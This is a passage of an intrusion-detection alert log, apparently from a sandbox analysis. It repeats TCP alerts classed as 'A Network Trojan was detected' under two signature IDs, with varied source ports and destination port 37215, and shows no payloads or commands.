          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283961
          SID:2835222
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870605
          SID:2835222
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467734
          SID:2829579
          Source Port:59108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163839
          SID:2829579
          Source Port:39310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288126
          SID:2829579
          Source Port:39912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206493
          SID:2835222
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720056
          SID:2829579
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034661
          SID:2829579
          Source Port:59260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074474
          SID:2835222
          Source Port:39224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077578
          SID:2835222
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225223
          SID:2829579
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569119
          SID:2829579
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988882
          SID:2835222
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863262
          SID:2835222
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036044
          SID:2829579
          Source Port:40066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692043
          SID:2829579
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2829579
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417713
          SID:2829579
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713149
          SID:2829579
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890995
          SID:2829579
          Source Port:55464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253203
          SID:2829579
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716078
          SID:2835222
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274272
          SID:2829579
          Source Port:39544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010807
          SID:2829579
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820837
          SID:2829579
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161099
          SID:2829579
          Source Port:54798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998745
          SID:2835222
          Source Port:52158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039020
          SID:2835222
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891042
          SID:2829579
          Source Port:34978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419053
          SID:2835222
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396337
          SID:2835222
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646112
          SID:2835222
          Source Port:60002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716318
          SID:2835222
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895581
          SID:2829579
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983718
          SID:2829579
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950100
          SID:2829579
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041368
          SID:2829579
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080944
          SID:2829579
          Source Port:42710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552399
          SID:2829579
          Source Port:52732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225391
          SID:2829579
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951559
          SID:2829579
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714454
          SID:2829579
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396894
          SID:2835222
          Source Port:36654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039674
          SID:2835222
          Source Port:50782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102264
          SID:2829579
          Source Port:43690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466873
          SID:2829579
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418296
          SID:2829579
          Source Port:40850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241913
          SID:2829579
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285484
          SID:2829579
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601095
          SID:2829579
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949754
          SID:2829579
          Source Port:33632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998766
          SID:2835222
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475541
          SID:2835222
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163476
          SID:2829579
          Source Port:57274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990565
          SID:2835222
          Source Port:57158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909340
          SID:2835222
          Source Port:48778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465000
          SID:2835222
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820675
          SID:2835222
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864467
          SID:2835222
          Source Port:54580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027317
          SID:2829579
          Source Port:40676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915011
          SID:2835222
          Source Port:46654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287569
          SID:2835222
          Source Port:49744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860410
          SID:2835222
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012802
          SID:2829579
          Source Port:43466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715055
          SID:2829579
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928564
          SID:2829579
          Source Port:34562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396116
          SID:2835222
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274767
          SID:2829579
          Source Port:49206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823140
          SID:2829579
          Source Port:53984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157342
          SID:2829579
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688163
          SID:2829579
          Source Port:44826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162640
          SID:2835222
          Source Port:47220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033047
          SID:2829579
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038596
          SID:2829579
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718906
          SID:2829579
          Source Port:44934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004498
          SID:2835222
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566368
          SID:2835222
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928951
          SID:2829579
          Source Port:52056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035054
          SID:2835222
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249318
          SID:2835222
          Source Port:56416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291413
          SID:2829579
          Source Port:60938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287551
          SID:2835222
          Source Port:59664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302251
          SID:2835222
          Source Port:54066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471656
          SID:2835222
          Source Port:36736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399035
          SID:2829579
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280589
          SID:2829579
          Source Port:47740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078123
          SID:2835222
          Source Port:40652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566447
          SID:2829579
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396425
          SID:2829579
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168282
          SID:2829579
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919211
          SID:2835222
          Source Port:43992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865310
          SID:2829579
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996193
          SID:2835222
          Source Port:35296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599148
          SID:2829579
          Source Port:47616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916048
          SID:2835222
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989400
          SID:2829579
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900326
          SID:2835222
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249348
          SID:2829579
          Source Port:48524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921896
          SID:2835222
          Source Port:36566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712904
          SID:2829579
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286180
          SID:2835222
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822216
          SID:2835222
          Source Port:36498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2835222
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476576
          SID:2829579
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164520
          SID:2829579
          Source Port:56144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598534
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471749
          SID:2829579
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919540
          SID:2829579
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411772
          SID:2829579
          Source Port:47216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471373
          SID:2835222
          Source Port:55236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988042
          SID:2829579
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077348
          SID:2835222
          Source Port:42334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926836
          SID:2835222
          Source Port:44386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989384
          SID:2835222
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226624
          SID:2835222
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945547
          SID:2829579
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104532
          SID:2835222
          Source Port:57882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714393
          SID:2835222
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719867
          SID:2835222
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991884
          SID:2829579
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.554098
          SID:2835222
          Source Port:37496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302590
          SID:2829579
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031756
          SID:2835222
          Source Port:36806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564411
          SID:2835222
          Source Port:35818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902198
          SID:2829579
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914324
          SID:2829579
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719417
          SID:2829579
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861038
          SID:2835222
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718109
          SID:2829579
          Source Port:43138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081754
          SID:2835222
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243550
          SID:2835222
          Source Port:39748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250889
          SID:2829579
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660065
          SID:2835222
          Source Port:41872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301082
          SID:2835222
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251412
          SID:2835222
          Source Port:52946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867310
          SID:2829579
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539900
          SID:2829579
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253314
          SID:2829579
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719476
          SID:2835222
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915052
          SID:2829579
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914191
          SID:2829579
          Source Port:34830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602795
          SID:2835222
          Source Port:59434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992259
          SID:2829579
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223989
          SID:2829579
          Source Port:34058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925465
          SID:2835222
          Source Port:39406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158005
          SID:2835222
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164901
          SID:2829579
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075680
          SID:2835222
          Source Port:48866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084054
          SID:2835222
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289150
          SID:2835222
          Source Port:35562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.723970
          SID:2829579
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603453
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993666
          SID:2835222
          Source Port:54792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283148
          SID:2829579
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910703
          SID:2835222
          Source Port:57840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000454
          SID:2829579
          Source Port:59520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010687
          SID:2829579
          Source Port:49898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948009
          SID:2835222
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563477
          SID:2835222
          Source Port:60262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862559
          SID:2835222
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134238
          SID:2835222
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030808
          SID:2829579
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243964
          SID:2829579
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717788
          SID:2835222
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947936
          SID:2835222
          Source Port:54092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678085
          SID:2835222
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073947
          SID:2829579
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592855
          SID:2829579
          Source Port:37314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274182
          SID:2835222
          Source Port:54022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466026
          SID:2835222
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868922
          SID:2829579
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860431
          SID:2829579
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230774
          SID:2835222
          Source Port:58416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862671
          SID:2835222
          Source Port:46490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594145
          SID:2835222
          Source Port:41740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161906
          SID:2835222
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867932
          SID:2829579
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222991
          SID:2829579
          Source Port:57340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931487
          SID:2835222
          Source Port:59238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718966
          SID:2829579
          Source Port:41584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945631
          SID:2829579
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598092
          SID:2829579
          Source Port:52152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035694
          SID:2835222
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227079
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929136
          SID:2829579
          Source Port:49456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924487
          SID:2835222
          Source Port:48296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643561
          SID:2829579
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539978
          SID:2835222
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558871
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168681
          SID:2835222
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225135
          SID:2835222
          Source Port:52362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916913
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014288
          SID:2829579
          Source Port:43906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946844
          SID:2835222
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471996
          SID:2835222
          Source Port:54642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027826
          SID:2835222
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249433
          SID:2829579
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
